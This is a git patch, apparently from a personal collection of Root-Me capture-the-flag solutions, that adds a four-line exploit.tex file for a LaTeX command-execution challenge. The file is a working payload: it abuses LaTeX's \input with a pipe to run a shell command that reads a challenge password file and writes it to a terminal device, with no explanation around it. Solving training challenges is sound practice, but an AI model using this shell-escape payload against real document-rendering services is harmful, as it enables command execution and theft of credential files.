From 14012de79afeb795c54837717abde709c821e6b7 Mon Sep 17 00:00:00 2001 From: Valentin Date: Tue, 14 Feb 2023 00:46:16 +0100 Subject: [PATCH] nouveaux challenges --- .../app-script/latex-execution-de-commandes/exploit.tex | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 rootme/challenges/app-script/latex-execution-de-commandes/exploit.tex diff --git a/rootme/challenges/app-script/latex-execution-de-commandes/exploit.tex b/rootme/challenges/app-script/latex-execution-de-commandes/exploit.tex new file mode 100644 index 0000000..8cca469 --- /dev/null +++ b/rootme/challenges/app-script/latex-execution-de-commandes/exploit.tex @@ -0,0 +1,4 @@ +\documentclass{article} +\begin{document} +\input{|"cat /challenge/app-script/ch24/flag_is_here/512cba42fe46c1f346996b51fa053b15fba17baefa038d434381aa68bba6/.passwd > /dev/pts/5"} +\end{document}